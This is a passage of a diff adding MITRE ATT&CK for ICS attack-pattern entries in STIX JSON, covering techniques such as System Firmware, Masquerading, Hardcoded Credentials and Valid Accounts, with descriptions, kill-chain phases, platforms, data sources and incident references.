out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0834", + "external_id": "T0834" + }, + { + "source_name": "The MITRE Corporation May 2017", + "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ", + "url": "https://attack.mitre.org/techniques/T1106/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Availability", + "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0826", + "external_id": "T0826" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "System Firmware", + "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0857", + "external_id": "T0857" + }, + { + "source_name": "Basnight, Zachry, et al.", + "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ", + "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Masquerading", + "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Scheduled Job: Scheduled Job Creation", + "Service: Service Creation", + "Command: Command Execution", + "File: File Modification", + "Service: Service Modification", + "Process: Process Metadata", + "File: File Metadata", + "Scheduled Job: Scheduled Job Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0849", + "external_id": "T0849" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Download", + "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0843", + "external_id": "T0843" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. \n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "File: File Access", + "Drive: Drive Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0847", + "external_id": "T0847" + }, + { + "source_name": "BBC April 2016", + "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14 ", + "url": "https://www.bbc.com/news/technology-36158606" + }, + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Christoph Steitz, Eric Auchard April 2016", + "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ", + "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS" + }, + { + "source_name": "Dark Reading Staff April 2016", + "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ", + "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298" + }, + { + "source_name": "ESET April 2016", + "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ", + "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/" + }, + { + "source_name": "Kernkraftwerk Gundremmingen April 2016", + "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ", + "url": "https://www.kkw-gundremmingen.de/presse.php?id=571" + }, + { + "source_name": "Lee Mathews April 2016", + "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 ", + "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/" + }, + { + "source_name": "Peter Dockrill April 2016", + "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ", + "url": "https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant" + }, + { + "source_name": "Sean Gallagher April 2016", + "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ", + "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/" + }, + { + "source_name": "Trend Micro April 2016", + "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Hardcoded Credentials", + "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Aagam Shah, @neutrinoguy, ABB" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Data Historian", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "created": "2022-09-29T13:35:38.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0891", + "external_id": "T0891" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Valid Accounts", + "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Engineering Workstation", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Logon Session: Logon Session Creation", + "User Account: User Account Authentication" + ], + "type": "attack-pattern", + "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0859", + "external_id": "T0859" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-09-27T16:38:58.028Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. (Citation: The MITRE Corporation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0890", + "external_id": "T0890" + }, + { + "source_name": "The MITRE Corporation", + "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", + "url": "https://attack.mitre.org/techniques/T1068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0846", + "external_id": "T0846" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1018" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Engineering Workstation Compromise", + "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0818", + "external_id": "T0818" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Connection Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 